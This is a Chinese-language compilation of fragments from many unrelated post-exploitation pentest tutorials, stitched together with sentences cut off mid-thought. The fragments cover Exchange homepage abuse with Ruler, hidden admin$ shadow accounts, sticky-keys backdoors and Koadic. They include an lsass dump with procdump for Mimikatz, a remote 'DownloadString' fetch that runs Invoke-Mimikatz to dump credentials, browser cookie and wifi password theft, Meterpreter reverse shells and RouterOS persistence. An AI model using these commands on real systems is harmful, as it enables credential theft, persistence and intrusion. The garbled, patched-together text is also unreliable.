如何抓住厂商完善产品“空窗期”,利用漏洞或者某种特性,做更多的事情,是渗透测试人员在每一次红队行动中需要思考的问题。 首先要弄清楚的是这6个请求之间的逻辑关系,即在发送后一个请求之前需要从前一个请求当中获取什么信息。 执行ruler并加上 --verbose 参数 $ . , cookie.Value) } 经过实验发现每次请求和返回会加上一个 MapiSequence 的Cookie, - 前面的数字表示请求的数据包顺序值, - 后面的内容是随机生成的4个字节进行编码后的结果 修改homepage后在主页代码插入漏洞利用代码,通过IE中存在的漏洞获取用户权限。
我在看教程的时候,除了学习技术之外更感慨的是作者的用心和专注,同时对渗透测试本质的思考。本订阅号得到亮神的授权,会按我个人的兴趣,选择一些文章不定期转载。 目标主机信息搜集的深度,决定后渗透权限持续把控。 渗透的本质是信息搜集,而信息搜集整理为后续的情报跟进提供了强大的保证。 持续渗透的本质是线索关联,而线索关联为后续的攻击链方提供了强大的方向。 后渗透的本质是权限把控,而权限把控为后渗透提供了以牺牲时间换取空间强大基础。 靶机背景介绍: ? 发现A2全补丁,放弃提权,(weblogic为user权限)对内信息刺探A2,得到weblogic相关配置文件,解密后,得到密码。 ? 如何把目标A与B的信息搜集,整理后做“线索关联”是一个非常有趣的工作。
经过之前的步骤,我们应该已经可以发现主机的漏洞,并且获取到一定的权限 下面就进入了后渗透测试阶段 在后渗透测试阶段我们主要的目标就是上传工具,权限提升,擦除攻击痕迹,安装持久化后门 以上的每一个步骤都至关重要 这个是安装win2003的截图,很熟悉的界面,上一次安装好想还是我在弄第一期培训 客户端安装完成后我们开始配置我们的TFTP服务器端,我们用Kali就可以完成这个服务器的假设 在假设服务器之前我们应该明确一点
0x00 前言 在渗透过程中拿下一台主机后很多时候会选择开3389进远程桌面查看一下对方主机内有无一些有价值的东西可以利用,但是这也引出了一个问题,只要是登录进程就一定会留下痕迹,虽然在渗透完成后可以通过痕迹清理的方法清除自己登录的 "证据",但是在多次渗透的过程中我不禁产生了思考,有没有一种方法能够最大化的隐藏自己登陆过对方主机呢,于是便有了下文。 ,利用这个思路,我们可以在修改注册表后再对System与Administrators权限进行拒绝访问,可防止管理员删除这个用户) ? 复制后如图所示 ? 导出Users下对应admin$项 ? 我这里保存到桌面 ? 再把Names下对应的admin$项导出 ? 同样导出到桌面 ? 导出后如图所示 ? 修改后成功登录 ? 0x02 细节拓展 那我们在实战中,是以远程登录界面为基础的。
重要声明 该培训中提及的技术只适用于合法CTF比赛和有合法授权的渗透测试,请勿用于其他非法用途,如用作其他非法用途与本文作者无关 我们今天进行一些理论知识的学习 顺便大家可以趁这段时间好好练习一下实战的操作 到这里我们想大家都已经成功进入了一台服务器或者获得了部分权限 不然就谈不上后渗透攻击了 后渗透攻击该做什么? ? Linux系统提权 Linux系统漏洞的exp一般按照内核版本来命名: 2.6.18-194或2.6.18.c等等 形如2.6.18-194这个形式的,可以直接执行 形如2.6.18.c,需要在目标机器上编译后运行 数据库提权就是利用执行数据库语句、利用数据库函数等方式提升服务器用户的权限 MySQL的提权一般是使用自定义函数提权或mof提权 而MsSQL的提权一般是调用xp_cmdshell函数来提权。 数据库提权首先我们要先有能力登入数库 所以通常我们拿到webshell之后要去网站目录去找数据库连接文件,常在形如xxx.conf或conf.xxx文件中 数据库提权的方法各种各样,这里就不罗列了,感兴趣的可以扫一下
\procdump.exe -r -ma lsass.exe lsass.dmp 在我们的攻击系统上下载内存转储文件后,我们可以运行Mimikatz并切换到 "Minidump "模式,以解析该文件,如下所示
什么是后渗透? 攻陷了服务器,主机取得一定权限(可能不是很高)就开始进入了后渗透阶段 把对方机器打蓝屏重启有什么作用? 利用一些方式将其关闭,最好设置些策略)、账号密码(管理员的账号密码或哈希值(哈希传递等方式登录)) 服务器信息,浏览器的浏览记录,网络数据的监听捕获,敏感文件搜索,查看是否是一台虚拟机,最近执行的操作 3.内网渗透 :端口转发(把内网的端口转到外网上面来,进行连接)、代理跳板 4.后门植入:永久后门维持权限(msf中集成了几种永久后门) 以下利用msfvenom生成木马获取权限开启后渗透阶段(当然也可以通过其他端口的漏洞等获取到
渗透测试大致可以分为以下五个阶段:侦察、扫描、获得访问权限、维护访问/持久性、数据渗漏。Koadic是发布于DEFCON上的一个后渗透工具,它可用于以上列举的最后两个阶段,即权限维持和数据渗漏。 星号表示zombie正在以提升后的权限运行。 ? 键入并运行: zombies 1 显示zombie的详细信息,以验证其权限状态。 ?
0x00:简介 何为“后渗透”?就是获取到受害者服务器的权限后,再继续对受害者服务器进行长期攻击或者信息获取的一种持续性手段。 –> 利用成功前提下必须有以下三个文件, 1、PHP的正常文件 2、修改后.user.ini文件 3、luomiweixiong.gif木马 ? ? -i 12 -p 6666 -r 192.168.124.14 说明 -i 目标自动回连时间 -p 设置目标反向连接的端口 -r 设置目标反向连接的ip地址 -U 设置目标自启动 加入自启动后,
koadic是DEFCON黑客大会上分享出来的的一个后渗透工具,虽然和msf有些相似,但是Koadic主要是通过使用Windows ScriptHost(也称为JScript / VBScript)进行大部分的操作 你只需要在目标主机上执行一条命令,即可完全控制目标主机,该工具在圈内有一个别名:大宝剑,对于一个热衷于后渗透测试的人员来说,算的上是,"居家旅行,杀人越货"必备良品了!
它不仅能够帮助安全专业人员发现网络中的潜在威胁,还提供了丰富的后渗透测试工具集,以评估系统的安全性。本文将介绍一些常用的Metasploit后渗透命令,帮助安全测试人员更好地理解和利用这些工具。 文件操作文件操作是后渗透测试中常见的任务,包括上传、下载文件等。 数据收集数据收集是后渗透测试中的重要环节,可以收集到有价值的敏感信息。 后渗透测试是指在成功利用漏洞并获得目标系统控制权之后进行的一系列操作,如信息收集、凭证获取、横向移动等。以下是一些常见的 Metasploit 后渗透命令及其实际应用场景:1. 不过,请始终确保在合法授权的情况下使用这些工具和技术,以遵守法律和道德规范。
Chisel允许端口转发,但我最喜欢的技术是在目标机器上设置一个反向SOCKS代理,允许你在目标系统上对任何流量进行隧道传输。 TightVNC\Server -Name "Password" | select -ExpandProperty Password 此外,别忘了用sqlcmd或Invoke-SqlCmd来列举任何本地数据库
1.0前言 后渗透常见的信息收集思路 延伸: 渗透测试中的技巧 后渗透阶段的攻防对抗 linux入侵后续指南 mimikittenz:又一款Windows密码获取工具 1.1系统管理员密码 DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds" tips:powershell 默认windows visa后才有 \default\USERDA~1 %localappdata%\google\chrome\USERDA~1\default\cookies chrome的用户信息保存在本地文件为sqlite 数据库格式 数据库密码获取 E.windows wifi密码的获取 netsh wlan show profiles 列出链接过的wifi netsh wlan export profile interface 很强大 sam 密码 ipc连接密码 1.9 常用的后渗透信息收集工具。
linux我们可以通过history来查看管理员最近操作过什么命令
后渗透之权限维护 影子账户(在用户名后面加上一个$符号) 原理:创建一个跟普通用户一样的用户,但是只能在注册表中才能查看到的用户。 点击确定,保存了后,关闭注册表,重新打开注册表,就可以看见SAM目录下的隐藏文件了。这个时候就可以看见添加的隐藏用户admin$ ? 还有个简单的办法,其实在控制面板中也可以看见 ? 好处:在我们未登陆系统(停留在登陆界面)的时候系统还不知道我们将以哪个用户登陆,所以在这个时候连续按5次shift后的话系统将会以system用户(具有管理员级别的权限)来运行sethc.exe这个程序 也就是说当修改了.user.ini后,不需要重启服务器中间件,只需要等待user_ini.cache_ttl所设置的时间(默认为300秒),即可被重新加载。 参数解析: -U:设置后门在用户登录后自启动。该方式会在HKCU\Software\Microsoft\Windows\CurrentVersion\Run下添加注册表信息。
PS:本文仅用于技术交流与分享,严禁用于非法用途 一. 配置ngrok准备内网穿透 内网穿透的必要性和原理就不用说了,直接说操作。 三.meterpreter后渗透功能测试 先配置好监听端 use exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset 希望这篇文章能够帮助大家的学习,但是这些技术仅供学习使用,切不可用这些技术做非法的事,合法上网从我做起 以上就是对于msf的简单利用,我还是一个渗透学习路上的菜鸟,欢迎大家提出过程中的问题,或者为后渗透的问题提供解决办法和思路
此次DEF CON的讨论还介绍了RouterOS过去和现在的后期利用技术。我大致将讨论分为以下两部分: 1.攻击者可以从中执行的位置。 2.如何实现重启或持久性。 这也是本文的主要内容。 创建目录后,攻击者需要删除磁盘上的共享对象。幸运的是,CVE-2019-3943也可以做到这一点。 当用户导航到“Files”界面时,它会被执行,但在用户导航离开后,它会关闭,并闲置一分钟的时间。 RC 脚本 RouterOS使用rc脚本在引导后启动进程,并在关闭期间清理某些进程。 重启后,将执行脚本并创建开发人员后门。 这种行为在6.40.9之后被移除。然而,直到那时,这是一个非常简单和方便的持久性机制。
shellcode,无任何加密,请使用Sgn项目对shellcode进行编码 使用方法 使用仓库中EXEToShellcode或者donut、pe_to_shellcode等工具将fscan、mimikatz等后渗透工具转为 注:请确保你转换后的shellcode能正常运行。 本工具仅限用于合法的渗透测试,请勿用于违法行为,因本工具造成的任何损失由使用者自行承担。
01 反弹MSF类型的Shell 我们通过web渗透,成功往Web服务器上上传了一句话木马,成功用菜刀连接。 然后我们现在想获得一个MSF类型的Shell。 02 添加内网路由 然后我们现在想要继续渗透内网。 我们先获取目标内网相关信息,可以看到该主机上的网卡有两个网段。 run get_local_subnets ? 注意:在实际的内网渗透中,我们可以直接添加到 0.0.0.0/0 的路由。这样,只要该被控 主机可达的地址就都可达!
后渗透阶段之基于MSF的路由转发 目录 反弹MSF类型的Shell 添加内网路由 MSF的跳板功能是MSF框架中自带的一个路由转发功能,其实现过程就是MSF框架在已经获取的Meterpreter Shell 拓扑图如下: 01 反弹MSF类型的Shell 我们通过web渗透,成功往Web服务器上上传了一句话木马,成功用菜刀连接。 然后我们现在想获得一个MSF类型的Shell。 02 添加内网路由 然后我们现在想要继续渗透内网。 我们先获取目标内网相关信息,可以看到该主机上的网卡有两个网段。 注意:在实际的内网渗透中,我们可以直接添加到 0.0.0.0/0 的路由。这样,只要该被控 主机可达的地址就都可达! END 来源:谢公子博客 责编:Vivian